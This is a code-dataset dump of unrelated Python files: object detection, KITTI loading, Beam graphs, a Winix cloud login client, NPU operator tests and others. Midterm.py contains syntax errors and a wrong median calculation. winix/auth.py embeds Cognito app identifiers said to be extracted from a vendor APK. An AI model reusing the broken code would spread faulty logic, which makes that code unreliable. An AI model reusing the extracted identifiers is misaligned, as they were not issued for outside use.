return box_indexes_to_keep, bounding_box_locations, class_ids, confidence_values
def show_detected_images(img, bounding_box_ids, all_bounding_boxes, classes, class_ids,
confidence_values, width_ratio, height_ratio, colors):
"""
Drawing the bounding boxes on the original images
Args:
img: Original image
bounding_box_ids: Idx of predicted bounding boxes after applying "Non-max suppression"
all_bounding_boxes: all vec (x, y, w, h) of each chosen bounding box
classes: list of all classes in COCO dataset
class_ids: idx for each predicted class of each bounding box based on COCO dataset's classes
confidence_values: Probability that the predicted class is correct
width_ratio: = original_width / YOLO_IMAGE_SIZE
height_ratio: = original_height / YOLO_IMAGE_SIZE
"""
# Iterate each bounding box's idx which is kept after 'non-max suppression'
for idx in bounding_box_ids.flatten():
bounding_box = all_bounding_boxes[idx]
x, y, w, h = int(bounding_box[0]), int(bounding_box[1]), int(bounding_box[2]), int(bounding_box[3])
# Transform (x,y,w,h) from resized image (320*320) to original image size
x = int(x * width_ratio)
y = int(y * height_ratio)
w = int(w * width_ratio)
h = int(h * height_ratio)
# Color for each detected box
color_box_current = colors[class_ids[idx]].tolist()
# Draw bounding box for each detected object
cv2.rectangle(img, (x, y), (x + w, y + h), color_box_current, 2)
# Title for each box
text_box = classes[int(class_ids[idx])] + ' ' + str(int(confidence_values[idx] * 100)) + '%'
cv2.putText(img, text_box, (x, y - 10), cv2.FONT_HERSHEY_COMPLEX_SMALL, 0.5, color_box_current, 1)
def parse_opt(known=False):
parser = argparse.ArgumentParser()
parser.add_argument('--video_path', type=str, default='', help='initial image path')
parser.add_argument('--class_path', type=str, default=DATA_FOLDER+'coco.names', help='initial class file path')
parser.add_argument('--cfg_path', type=str, default=CFG_FOLDER+'yolov3.cfg', help='initial cfg file path')
parser.add_argument('--weights_path', type=str, default=MODEL_FOLDER+'yolov3.weights', help='initial '
'pre-trained '
'weights file path')
opt = parser.parse_known_args()[0] if known else parser.parse_args()
return opt
def main(opt):
# Label objects for prediction (totally 80)
with open(opt.class_path) as f:
labels = list(line.strip() for line in f)
# Setting colors for each label
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype='uint8')
# Read the configuration file & initialize the weight of yolov3 model
neural_network = cv2.dnn.readNetFromDarknet(opt.cfg_path, opt.weights_path)
# define whether we run the algorithm with CPU or with GPU
# WE ARE GOING TO USE CPU !!!
neural_network.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
neural_network.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)
# VIDEO PROCESSING
video_capture = cv2.VideoCapture(opt.video_path)
while video_capture.isOpened():
# Read each frame of video
is_grab, frame = video_capture.read()
original_width, original_height = frame.shape[1], frame.shape[0]
# Preprocess frame before inputting into model
blob = cv2.dnn.blobFromImage(frame, 1 / 255, (YOLO_IMAGE_SIZE, YOLO_IMAGE_SIZE), True, crop=False)
neural_network.setInput(blob)
# Taking the last 3 layers from pretrained models for processing the image
layer_names = neural_network.getLayerNames()
output_names = [layer_names[idx[0] - 1] for idx in neural_network.getUnconnectedOutLayers()]
# Apply "Forward propagation" with input for last 3 layers
outputs = neural_network.forward(output_names)
# Extract values from prediction vector
predicted_objects_idx, bbox_locations, class_label_ids, conf_values = find_objects(outputs)
# Show bounding boxes on the original image
show_detected_images(frame, predicted_objects_idx, bbox_locations, labels, class_label_ids, conf_values,
original_width / YOLO_IMAGE_SIZE, original_height / YOLO_IMAGE_SIZE, colors)
cv2.imshow('YOLO Algorithm', frame)
# Press "ESC" to quit the video
key = cv2.waitKey(1) & 0xff
if (key == 27) | (not is_grab): # 27 represents key "ESC"
break
# Destroy & Release the camera
video_capture.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 3.03125 | 3 |
sfm_torch/utils/kitti.py | ArthurAllshire/sfm-torch | 0 | 12757365 | import torch
import pykitti
from torch.utils.data import Dataset
from torchvision.utils import make_grid
import torchvision.transforms.functional as TF
import matplotlib.pyplot as plt
def transform_stereo_lidar(samples):
for k in samples:
samples[k] = TF.to_tensor(samples[k])
return samples
class KittiDenseDrive(Dataset):
"""Dataset for prediction of dense (images) from the Kitti Dataset."""
def __init__(self, basedir, date, drive, transform=None):
"""
"""
self.basedir = basedir
self.date = date
self.drive = drive
self.kitti = pykitti.raw(basedir, date, drive)
self.transform = transform
def __len__(self):
return len(self.kitti)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
# rgb - left, right
cam2, cam3 = self.kitti.get_rgb(idx)
# velodyne scan
velo = self.kitti.get_velo(idx)
samples = {"left_rgb": cam2, "right_rgb": cam3, "velo": velo}
samples = self.transform(samples)
return samples
| 2.796875 | 3 |
sdks/python/apache_beam/runners/interactive/pipeline_graph.py | h4rr21/beam | 1 | 12757366 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""For generating Beam pipeline graph in DOT representation.
This module is experimental. No backwards-compatibility guarantees.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import threading
import pydot
class PipelineGraph(object):
"""Creates a DOT representation of the pipeline. Thread-safe."""
def __init__(self,
pipeline_proto,
default_vertex_attrs=None,
default_edge_attrs=None):
"""Constructor of PipelineGraph.
Args:
pipeline_proto: (Pipeline proto)
default_vertex_attrs: (Dict[str, str]) a dict of default vertex attributes
default_edge_attrs: (Dict[str, str]) a dict of default edge attributes
"""
self._lock = threading.Lock()
self._graph = None
# A dict from PCollection ID to a list of its consuming Transform IDs
self._consumers = collections.defaultdict(list)
# A dict from PCollection ID to its producing Transform ID
self._producers = {}
transforms = pipeline_proto.components.transforms
for transform_id, transform in transforms.items():
if not self._is_top_level_transform(transform):
continue
for pcoll_id in transform.inputs.values():
self._consumers[pcoll_id].append(transform_id)
for pcoll_id in transform.outputs.values():
self._producers[pcoll_id] = transform_id
vertex_dict, edge_dict = self._generate_graph_dicts()
self._construct_graph(vertex_dict,
edge_dict,
default_vertex_attrs,
default_edge_attrs)
def get_dot(self):
return str(self._get_graph())
def _is_top_level_transform(self, transform):
return transform.unique_name and '/' not in transform.unique_name \
and not transform.unique_name.startswith('ref_')
def _generate_graph_dicts(self):
"""From pipeline_proto and other info, generate the graph.
Returns:
vertex_dict: (Dict[str, Dict[str, str]]) vertex mapped to attributes.
edge_dict: (Dict[(str, str), Dict[str, str]]) vertex pair mapped to the
edge's attribute.
"""
transforms = self._pipeline_proto.components.transforms
# A dict from vertex name (i.e. PCollection ID) to its attributes.
vertex_dict = collections.defaultdict(dict)
# A dict from vertex name pairs defining the edge (i.e. a pair of PTransform
# IDs defining the PCollection) to its attributes.
edge_dict = collections.defaultdict(dict)
self._edge_to_vertex_pairs = collections.defaultdict(list)
for _, transform in transforms.items():
if not self._is_top_level_transform(transform):
continue
vertex_dict[transform.unique_name] = {}
for pcoll_id in transform.outputs.values():
# For PCollections without consuming PTransforms, we add an invisible
# PTransform node as the consumer.
if pcoll_id not in self._consumers:
invisible_leaf = 'leaf%s' % (hash(pcoll_id) % 10000)
vertex_dict[invisible_leaf] = {'style': 'invis'}
self._edge_to_vertex_pairs[pcoll_id].append(
(transform.unique_name, invisible_leaf))
edge_dict[(transform.unique_name, invisible_leaf)] = {}
else:
for consumer in self._consumers[pcoll_id]:
producer_name = transform.unique_name
consumer_name = transforms[consumer].unique_name
self._edge_to_vertex_pairs[pcoll_id].append(
(producer_name, consumer_name))
edge_dict[(producer_name, consumer_name)] = {}
return vertex_dict, edge_dict
def _get_graph(self):
"""Returns pydot.Dot object for the pipeline graph.
The purpose of this method is to avoid accessing the graph while it is
updated. No one except for this method should be accessing _graph directly.
Returns:
(pydot.Dot)
"""
with self._lock:
return self._graph
def _construct_graph(self, vertex_dict, edge_dict,
default_vertex_attrs, default_edge_attrs):
"""Constructs the pydot.Dot object for the pipeline graph.
Args:
vertex_dict: (Dict[str, Dict[str, str]]) maps vertex names to attributes
edge_dict: (Dict[(str, str), Dict[str, str]]) maps vertex name pairs to
attributes
default_vertex_attrs: (Dict[str, str]) a dict of attributes
default_edge_attrs: (Dict[str, str]) a dict of attributes
"""
with self._lock:
self._graph = pydot.Dot()
if default_vertex_attrs:
self._graph.set_node_defaults(**default_vertex_attrs)
if default_edge_attrs:
self._graph.set_edge_defaults(**default_edge_attrs)
self._vertex_refs = {} # Maps vertex name to pydot.Node
self._edge_refs = {} # Maps vertex name pairs to pydot.Edge
for vertex, vertex_attrs in vertex_dict.items():
vertex_ref = pydot.Node(vertex, **vertex_attrs)
self._vertex_refs[vertex] = vertex_ref
self._graph.add_node(vertex_ref)
for edge, edge_attrs in edge_dict.items():
edge_ref = pydot.Edge(edge[0], edge[1], **edge_attrs)
self._edge_refs[edge] = edge_ref
self._graph.add_edge(edge_ref)
def _update_graph(self, vertex_dict=None, edge_dict=None):
"""Updates the pydot.Dot object with the given attribute update
Args:
vertex_dict: (Dict[str, Dict[str, str]]) maps vertex names to attributes
edge_dict: This should be
Either (Dict[str, Dict[str, str]]) which maps edge names to attributes
Or (Dict[(str, str), Dict[str, str]]) which maps vertex pairs to edge
attributes
"""
def set_attrs(ref, attrs):
for attr_name, attr_val in attrs.items():
ref.set(attr_name, attr_val)
with self._lock:
if vertex_dict:
for vertex, vertex_attrs in vertex_dict.items():
set_attrs(self._vertex_refs[vertex], vertex_attrs)
if edge_dict:
for edge, edge_attrs in edge_dict.items():
if isinstance(edge, tuple):
set_attrs(self._edge_refs[edge], edge_attrs)
else:
for vertex_pair in self._edge_to_vertex_pairs[edge]:
set_attrs(self._edge_refs[vertex_pair], edge_attrs)
| 1.875 | 2 |
basis_func_list.py | jun63x/sparse_coding | 0 | 12757367 | <filename>basis_func_list.py
import matplotlib.pyplot as plt
from tqdm import tqdm
class BasisFuncList:
def __init__(self, basis_func_list):
self.basis_func_list = basis_func_list
def save(self, img_dir):
for i, func in tqdm(
enumerate(self.basis_func_list),
total=len(self.basis_func_list),
ncols=50
):
plt.imsave(
img_dir+'/patch'+str(i).zfill(3)+'.png',
func,
cmap='binary'
)
| 2.390625 | 2 |
Midterm.py | anyrama/ITP27-Thuany | 0 | 12757368 | def middle_element (lst):
if len(lst)%2 == 1
index1 = int(len(lst)/2-0.5)
indext2 = -(int(len(lst)/2))
median = (lst[index1]+ lst[index2])/2
return median
else:
index= int(len(lst)/2-0.5)
return lst[index]
print (middle_element([5,2,-4]))
| 3.75 | 4 |
winix/auth.py | dgsharpe/winix | 0 | 12757369 | <reponame>dgsharpe/winix<gh_stars>0
from dataclasses import dataclass
import boto3
import boto3
from botocore import UNSIGNED
from botocore.client import Config
# Pulled from Winix Home v1.0.8 APK
COGNITO_APP_CLIENT_ID = "14og512b9u20b8vrdm55d8empi"
COGNITO_CLIENT_SECRET_KEY = "<KEY>"
COGNITO_USER_POOL_ID = "us-east-1_Ofd50EosD"
COGNITO_REGION = "us-east-1"
@dataclass
class WinixAuthResponse:
user_id: str
access_token: str
refresh_token: str
id_token: str
def login(username: str, password: str, **kwargs):
"""Generate fresh credentials"""
from warrant_lite import WarrantLite
from jose import jwt
wl = WarrantLite(
username=username,
password=password,
pool_id=kwargs.get("pool_id", COGNITO_USER_POOL_ID),
client_id=kwargs.get("client_id", COGNITO_APP_CLIENT_ID),
client_secret=kwargs.get("client_secret", COGNITO_CLIENT_SECRET_KEY),
client=_boto_client(kwargs.get("pool_region")),
)
resp = wl.authenticate_user()
return WinixAuthResponse(
user_id=jwt.get_unverified_claims(resp["AuthenticationResult"]["AccessToken"])[
"sub"
],
access_token=resp["AuthenticationResult"]["AccessToken"],
refresh_token=resp["AuthenticationResult"]["RefreshToken"],
id_token=resp["AuthenticationResult"]["IdToken"],
)
def refresh(user_id: str, refresh_token: str, **kwargs) -> WinixAuthResponse:
"""Refresh """
from warrant_lite import WarrantLite
client_id = kwargs.get("client_id", COGNITO_APP_CLIENT_ID)
auth_params = {
"REFRESH_TOKEN": refresh_token,
"SECRET_HASH": WarrantLite.get_secret_hash(
username=user_id,
client_id=client_id,
client_secret=kwargs.get("client_secret", COGNITO_CLIENT_SECRET_KEY),
),
}
resp = _boto_client(kwargs.get("pool_region")).initiate_auth(
ClientId=client_id, AuthFlow="REFRESH_TOKEN", AuthParameters=auth_params,
)
return WinixAuthResponse(
user_id=user_id,
access_token=resp["AuthenticationResult"]["AccessToken"],
refresh_token=refresh_token,
id_token=resp["AuthenticationResult"]["IdToken"],
)
def _boto_client(region):
"""Get an uncredentialed boto"""
return boto3.client(
"cognito-idp",
config=Config(signature_version=UNSIGNED),
region_name=region or COGNITO_REGION,
)
| 2.1875 | 2 |
source/pic2card/app/api.py | riag23/AdaptiveCards | 1 | 12757370 | """Flask service to predict the adaptive card json from the card design"""
import os
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask
from flask_cors import CORS
from flask_restplus import Api
from mystique.utils import load_od_instance
from . import resources as res
from mystique import config
logger = logging.getLogger("mysitque")
logger.setLevel(logging.DEBUG)
# Suppress the tf warnings.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = '3'
file_handler = RotatingFileHandler(
'mystique_app.log', maxBytes=1024 * 1024 * 100, backupCount=20)
formatter = logging.Formatter(
"%(asctime)s - [%(filename)s:%(lineno)s - %(funcName)20s() ] - \
%(levelname)s - %(message)s")
file_handler.setFormatter(formatter)
file_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
app = Flask(__name__)
CORS(app)
api = Api(app, title="Mystique", version="1.0",
default="Jobs", default_label="",
description="Mysique App For Adaptive card Json Prediction from \
UI Design")
api.add_resource(res.GetCardTemplates, '/get_card_templates',
methods=['GET'])
# Conditional loading helps to reduce the bundle size, as we don't need to
# package the tensorflow.
# TODO: Experimental API
if config.ENABLE_TF_SERVING:
api.add_resource(res.TfPredictJson, '/tf_predict_json',
methods=['POST'])
else:
api.add_resource(res.PredictJson, '/predict_json', methods=['POST'])
# Load the models and cache it for request handling.
app.od_model = load_od_instance()
# Include more debug points along with /predict_json api.
api.add_resource(res.DebugEndpoint, "/predict_json_debug", methods=["POST"])
api.add_resource(res.GetVersion, "/version", methods=["GET"])
| 2.25 | 2 |
hic2cool/hic2cool_updates.py | pkerpedjiev/hic2cool | 36 | 12757371 | """
This module contains updates used with the `hic2cool update` command.
See usage in hic2cool.hic2cool_utils.hic2cool_update
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals
)
import h5py
from .hic2cool_config import *
def prepare_hic2cool_updates(version_nums):
"""
Find what must be done when actually running `hic2cool update`
Determines what updates are necessary based off of version numbers
Version numbers is a list of ints in form: [major, minor, release]
"""
updates = []
# normalization vectors were inverted before version 0.5.0
if version_nums[0] == 0 and version_nums[1] < 5:
updates.append(
{
'title': 'Invert weights',
'effect': 'Invert cooler weights so that they match original hic normalization values',
'detail': 'cooler uses multiplicative weights and hic uses divisive weights. Before version 0.5.0, hic2cool inverted normalization vectors for consistency with cooler behavior, but now that is no longer done for consistency with 4DN analysis pipelines.',
'function': update_invert_weights
}
)
# import cooler attributes added in version 0.6.0
if version_nums[0] == 0 and version_nums[1] < 6:
updates.append(
{
'title': 'Add cooler schema version',
'effect': 'Add a couple important cooler schema attributes',
'detail': 'Adds format-version and storage-mode attributes to hdf5 for compatibility with cooler schema v3.',
'function': update_cooler_schema_v3
}
)
# import mcool attributes added in version 0.7.1
if version_nums[0] == 0 and ((version_nums[1] == 7 and version_nums[2] < 1) or version_nums[1] < 7):
updates.append(
{
'title': 'Add mcool schema attributes',
'effect': 'Adds missing schema attributes if this is a multi-resolution cooler',
'detail': 'Adds format and format-version attributes to the "/" hdf5 collection for mcool schema v2.',
'function': update_mcool_schema_v2
}
)
return updates
def norm_convert(val):
"""
hic2cool now just uses hic normalization vectors as-is,
without attempting to invert them to match cooler convention. This function
is now only used with `hic2cool update` to revert cooler weights to their
original hic values.
Simply invert norm vectors, since hic norms are divisive and cooler
weights are multiplicative.
"""
if val != 0.0:
return 1 / val
else:
return np.nan
def update_invert_weights(writefile):
"""
Invert all the weights from each resolution (if a mult-res file) or the
top level (if a single-res file)
"""
# helper fxn
def update_invert_weight_for_resolution(h5_data, res=None):
"""
Access the bins table, find the weights, and invert
"""
found_weights = [val for val in h5_data if val not in ['chrom', 'start', 'end']]
for weight in found_weights:
h5_weight = h5_data[weight][:]
h5_data[weight][:] = list(map(norm_convert, h5_weight))
if res:
print('... For resolution %s, inverted following weights: %s' % (res, found_weights))
else:
print('... Inverted following weights: %s' % found_weights)
with h5py.File(writefile) as h5_file:
if 'resolutions' in h5_file:
for res in h5_file['resolutions']:
update_invert_weight_for_resolution(h5_file['resolutions'][res]['bins'], res=res)
else:
update_invert_weight_for_resolution(h5_file['bins'])
def update_cooler_schema_v3(writefile):
"""
Add format-version and storage-mode attributes to given cooler
"""
# helper fxn
def add_v3_attrs(h5_data, res=None):
info = {
'format-version': COOLER_FORMAT_VERSION,
'storage-mode': 'symmetric-upper'
}
h5_data.attrs.update(info)
if res:
print('... For resolution %s, added format-version and storage-mode attributes' % res)
else:
print('... Added format-version and storage-mode attributes')
with h5py.File(writefile) as h5_file:
if 'resolutions' in h5_file:
for res in h5_file['resolutions']:
add_v3_attrs(h5_file['resolutions'][res], res=res)
else:
add_v3_attrs(h5_file)
def update_mcool_schema_v2(writefile):
"""
Add format and format-version attributes to the base level of an mcool
"""
with h5py.File(writefile) as h5_file:
# only run if it's an mcool and 'resolutions' exist
if 'resolutions' in h5_file:
mcool_info = {
'format': MCOOL_FORMAT,
'format-version': MCOOL_FORMAT_VERSION
}
h5_file.attrs.update(mcool_info)
print('... Added format and format-version attributes for the mcool')
else:
print('... Not a multi-res file, so will not add mcool schema attributes')
| 2.1875 | 2 |
calc/migrations/0021_auto_20210712_1234.py | AlexGogev/Django-Kids-Math | 0 | 12757372 | <reponame>AlexGogev/Django-Kids-Math
# Generated by Django 3.1.12 on 2021-07-12 11:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('calc', '0020_adding_num1'),
]
operations = [
migrations.AlterField(
model_name='adding',
name='num1',
field=models.IntegerField(null=True, verbose_name=3),
),
]
| 2.1875 | 2 |
RandomCorrMat/RandomCorr.py | KikeM/RandomCorrMat | 0 | 12757373 | # ----------------------------------------------------
# Generate a random correlations
# ----------------------------------------------------
import numpy as np
def randCorr(size, lower=-1, upper=1):
"""
Create a random matrix T from uniform distribution of dimensions size x m (assumed to be 10000)
normalize the rows of T to lie in the unit sphere r = r / sqrt(r'r)
RandCorr = TT'
@param size: size of the matrix
@param lower: lower limit of the uniform distribution used to create the corr matrix
@param upper: upper limit of the uniform distribution used to create the corr matrix
@return: numpy ndarray, correlation matrix
"""
m = 1000
randomMatrix = np.random.uniform(lower, upper, (size, m))
norms = np.sum(randomMatrix**2, axis=1)
T = np.divide(randomMatrix, np.sqrt(norms).reshape(size,1))
c = np.dot(T, T.T)
c[np.diag_indices(size)] = 1.
return c
| 3.578125 | 4 |
test/test_npu/test_network_ops/test_bitwise_not.py | Ascend/pytorch | 1 | 12757374 | # Copyright (c) 2020, Huawei Technologies.All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import numpy as np
import sys
import copy
from common_utils import TestCase, run_tests
from common_device_type import dtypes, instantiate_device_type_tests
from util_test import create_common_tensor
class Test_Bitwise_Not(TestCase):
def generate_data(self, min_d, max_d, shape, dtype):
input1 = np.random.uniform(min_d, max_d, shape).astype(dtype)
npu_input1 = torch.from_numpy(input1)
return npu_input1
def generate_bool_data(self, shape):
input1 = np.random.randint(0, 2, shape).astype(np.bool_)
npu_input1 = torch.from_numpy(input1)
return npu_input1
def cpu_op_exec(self, input1):
output = torch.bitwise_not(input1)
if output.dtype not in [torch.int32, torch.int8, torch.bool]:
output = output.to(torch.int32)
output = output.numpy()
return output
def npu_op_exec(self, input1):
input1 = input1.to("npu")
output = torch.bitwise_not(input1)
output = output.to("cpu")
if output.dtype not in [torch.int32, torch.int8, torch.bool]:
output = output.to(torch.int32)
output = output.numpy()
return output
def npu_op_exec_out(self, input1, input2):
input1 = input1.to("npu")
input2 = input2.to("npu")
torch.bitwise_not(input1, out = input2)
output = input2.to("cpu")
if output.dtype not in [torch.int32, torch.int8, torch.bool]:
output = output.to(torch.int32)
output = output.numpy()
return output
def test_bitwise_not_bool(self, device):
npu_input1 = self.generate_bool_data((2, 3))
cpu_output = self.cpu_op_exec(npu_input1)
npu_output = self.npu_op_exec(npu_input1)
self.assertRtolEqual(cpu_output, npu_output)
def test_bitwise_not_int16(self, device):
npu_input1 = self.generate_data(0, 2342, (2, 3), np.int16)
cpu_output = self.cpu_op_exec(npu_input1)
npu_output = self.npu_op_exec(npu_input1)
self.assertRtolEqual(cpu_output, npu_output)
def test_bitwise_not_int32(self, device):
npu_input1 = self.generate_data(0, 34222, (2, 3), np.int32)
cpu_output = self.cpu_op_exec(npu_input1)
npu_output = self.npu_op_exec(npu_input1)
self.assertRtolEqual(cpu_output, npu_output)
def test_bitwise_not_int64(self, device):
npu_input1 = self.generate_data(0, 355553, (2, 3), np.int64)
cpu_output = self.cpu_op_exec(npu_input1)
npu_output = self.npu_op_exec(npu_input1)
self.assertRtolEqual(cpu_output, npu_output)
def test_bitwise_not_out(self, device):
shape_format = [
[[0, 2342, [2, 3], np.int16], [0, 2342, [10, 20], np.int16]],
[[0, 34222, [2, 3], np.int32], [0, 34222, [10, 20], np.int32]],
[[0, 355553, [2, 3], np.int64], [0, 355553, [1, 1], np.int64]],
]
for item in shape_format:
npu_input1 = self.generate_data(item[0][0], item[0][1], item[0][2], item[0][3])
npu_input2 = self.generate_data(item[1][0], item[1][1], item[1][2], item[1][3])
cpu_output = self.cpu_op_exec(npu_input1)
npu_output1 = self.npu_op_exec_out(npu_input1, npu_input1)
npu_output2 = self.npu_op_exec_out(npu_input1, npu_input2)
self.assertRtolEqual(cpu_output, npu_output1)
self.assertRtolEqual(cpu_output, npu_output1)
instantiate_device_type_tests(Test_Bitwise_Not, globals(), except_for='cpu')
if __name__ == "__main__":
run_tests()
| 2.15625 | 2 |
ansys/tools/protoc_helper/_distutils_overrides.py | ansys/ansys-tools-protoc-helper | 0 | 12757375 | # type: ignore
# Type checking causes problems with the mixin approach used here. This
# could be overcome by subclassing '_CompileProtosMixin' from
# 'distutils.core.Command', but mypy *also* doesn't recognize that
# this class has a 'distribution' attribute. Overall, it's not worth
# the extra overhead.
"""Defines setuptools commands to execute the proto compilation.
Define commands which can be used in the setuptools ``cmdclass``
directive to override the default behavior, and compile the .proto
files before the command is executed.
"""
from setuptools.command.build_py import build_py
from setuptools.command.develop import develop
from ._compile_protos import compile_proto_files
__all__ = ["BuildPyCommand", "DevelopCommand", "CMDCLASS_OVERRIDE"]
class _CompileProtosMixin:
"""Mixin class which adds .proto compilation to a command."""
def run(self):
try:
target_dir = self.distribution.package_dir[""]
except (KeyError, TypeError):
target_dir = "."
compile_proto_files(target_dir)
super().run()
class BuildPyCommand(_CompileProtosMixin, build_py):
"""Command to compile .proto files while building the package wheel.
Override for the ``build_py`` command which adds compilation of
.proto files to Python source.
"""
class DevelopCommand(_CompileProtosMixin, develop):
"""Command to compile .proto files during editable installs.
Override for the ``develop`` command which adds compilation of
.proto files to Python source.
"""
CMDCLASS_OVERRIDE = {"build_py": BuildPyCommand, "develop": DevelopCommand}
| 2 | 2 |
app/display_modules/ancestry/tests/test_module.py | MetaGenScope/metagenscope-server | 0 | 12757376 | <reponame>MetaGenScope/metagenscope-server<gh_stars>0
"""Test suite for Ancestry diplay module."""
from app.display_modules.display_module_base_test import BaseDisplayModuleTest
from app.display_modules.ancestry import AncestryDisplayModule
from app.samples.sample_models import Sample
from app.display_modules.ancestry.models import AncestryResult
from app.display_modules.ancestry.constants import MODULE_NAME, TOOL_MODULE_NAME
from app.display_modules.ancestry.tests.factory import AncestryFactory
from app.tool_results.ancestry.tests.factory import (
create_values,
create_ancestry
)
class TestAncestryModule(BaseDisplayModuleTest):
"""Test suite for Ancestry diplay module."""
def test_get_ancestry(self):
"""Ensure getting a single Ancestry behaves correctly."""
ancestry = AncestryFactory()
self.generic_getter_test(ancestry, MODULE_NAME)
def test_add_ancestry(self):
"""Ensure Ancestry model is created correctly."""
samples = {
'sample_1': {'populations': create_values()},
'sample_2': {'populations': create_values()},
}
ancestry_result = AncestryResult(samples=samples)
self.generic_adder_test(ancestry_result, MODULE_NAME)
def test_run_ancestry_sample(self): # pylint: disable=invalid-name
"""Ensure TaxaTree run_sample produces correct results."""
kwargs = {
TOOL_MODULE_NAME: create_ancestry(),
}
self.generic_run_sample_test(kwargs, AncestryDisplayModule)
def test_run_ancestry_sample_group(self): # pylint: disable=invalid-name
"""Ensure Ancestry run_sample_group produces correct results."""
def create_sample(i):
"""Create unique sample for index i."""
data = create_ancestry()
args = {
'name': f'Sample{i}',
'metadata': {'foobar': f'baz{i}'},
TOOL_MODULE_NAME: data,
}
return Sample(**args).save()
self.generic_run_group_test(create_sample,
AncestryDisplayModule)
| 1.9375 | 2 |
layer_rename.py | boris-fx/mocha-scripts | 6 | 12757377 | # BSD 3-Clause License
#
# Copyright (c) 2020, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import shiboken2
from PySide2.QtCore import *
from PySide2.QtGui import *
class LayerRenameDialog(QDialog):
def __init__(self, parent=None):
QDialog.__init__(self, parent)
self._widgets = dict()
self.create_widgets()
self.create_layout()
self.create_connections()
def create_widgets(self):
self._widgets['old_name'] = QLineEdit(self)
self._widgets['new_name'] = QLineEdit(self)
self._widgets['ok'] = QPushButton("OK", self)
self._widgets['cancel'] = QPushButton("Cancel", self)
def create_layout(self):
main_layout = QGridLayout(self)
form_layout = QFormLayout(self)
form_layout.addRow("Old name:", self._widgets['old_name'])
form_layout.addRow("New name:", self._widgets['new_name'])
main_layout.addLayout(form_layout, 0, 0, 3, 3)
main_layout.addWidget(self._widgets['ok'], 3, 1)
main_layout.addWidget(self._widgets['cancel'], 3, 2)
self.setLayout(main_layout)
def create_connections(self):
self._widgets['ok'].clicked.connect(self.do_rename)
self._widgets['cancel'].clicked.connect(self.reject)
def do_rename(self):
proj = get_current_project()
if not proj:
self.reject()
old_name = self._widgets['old_name'].text()
new_name = self._widgets['new_name'].text()
layers = proj.find_layers(old_name)
if not layers:
msg = QMessageBox(self)
msg.setText("No layers with name %s" % old_name)
msg.exec_()
self.reject()
map(lambda layer: setattr(layer, 'name', new_name), layers)
self.accept()
if __name__ == "__main__":
from mocha import ui
mw = ui.get_widgets()['MainWindow']
rename = LayerRenameDialog(parent=mw)
rename.show()
| 1.242188 | 1 |
samples/redpen/pre_process.py | diaoxinqiang/Mask_RCNN | 1 | 12757378 | <reponame>diaoxinqiang/Mask_RCNN
import cv2
import numpy as np
import os
import glob
import json
def delete_file(image_path, annotations):
file_name = ''.join(os.path.splitext(os.path.basename(image_path)))
file_size = int(os.path.getsize(image_path))
key = file_name + str(file_size)
isExist = key in annotations.keys()
if not isExist:
os.remove(image_path)
def save_json(path, data):
with open(path, 'w') as f:
f.write(json.dumps(data))
def to_gray_image(path, img_dir_path):
file_name = ''.join(os.path.splitext(os.path.basename(image_path)))
# 读取图片
image = cv2.imread(path, flags=cv2.IMREAD_COLOR)
_, threshold = cv2.threshold(image, 180, 255, cv2.THRESH_BINARY)
threshold = cv2.resize(threshold, None, fx=0.33, fy=0.33, interpolation=cv2.INTER_LINEAR)
cv2.imwrite(os.path.join(img_dir_path, file_name), threshold,
)
# 质量压缩参数 [int(cv2.IMWRITE_JPEG_QUALITY), 5]
def getPositions(x, y, change, max):
if x == change:
change1 = x
change2 = y
if y == change:
change1 = y
change2 = x
